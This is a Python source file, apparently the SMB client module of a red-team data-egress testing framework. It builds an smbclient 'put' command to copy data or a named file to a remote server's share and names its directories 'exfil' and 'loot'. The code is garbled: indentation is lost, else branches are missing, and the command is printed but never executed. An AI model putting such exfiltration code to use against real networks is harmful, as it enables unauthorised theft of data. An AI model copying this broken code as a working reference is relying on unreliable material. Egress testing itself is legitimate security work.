75 lines
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75 lines
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This is the template that should be used for client modules.
A brief description of the client module can/should be placed
up here. All necessary imports should be placed between the
comments and class declaration.
Finally, be sure to rename your client module to a .py file
import os
from common import helpers
class Client:
# Within __init__, you have access to everything passed in
# via the command line. self.protocol is the variable listed
# when running --list-clients and is what is used in conjunction
# with --client <client>. self.protocol is the only required attribute
# of the object.
def __init__(self, cli_object):
self.protocol = "smb"
self.remote_server = cli_object.ip
if cli_object.file is None:
self.file_transfer = False
if "/" in cli_object.file:
self.file_transfer = cli_object.file
self.file_name = cli_object.file.split("/")[-1]
self.file_name = cli_object.file
# transmit is the only required function within the object. It is what
# called by the framework to transmit data. However, you can create as
# many "sub functions" for transmit to invoke as needed. "data_to_transmit"
# is a variable passed in by the framework which contains the data that
# is to be sent out by the client.
def transmit(self, data_to_transmit):
# find current directory, make directory for mounting share
# current directory
exfil_directory = os.path.join(os.getcwd(), "mount")
mount_path = exfil_directory + "/"
# Check to make sure the agent directory exists, and a loot
# directory for the agent. If not, make them
if not os.path.isdir(mount_path):
# Base command to copy file over smb
smb_command = "smbclient \\\\\\\\" + self.remote_server + "\\\\DATA -N -c \"put "
# If using a file, copy it, else write to disk and then copy
if not self.file_transfer:
smb_file_name = helpers.writeout_text_data(data_to_transmit)
smb_full_path = helpers.ea_path() + "/" + smb_file_name
smb_command += smb_file_name + "\""
smb_command += self.file_transfer + " " + self.file_name + "\""
smb_file_name = self.file_transfer
print smb_command
if not self.file_transfer:
print "[*] File Transmitted!"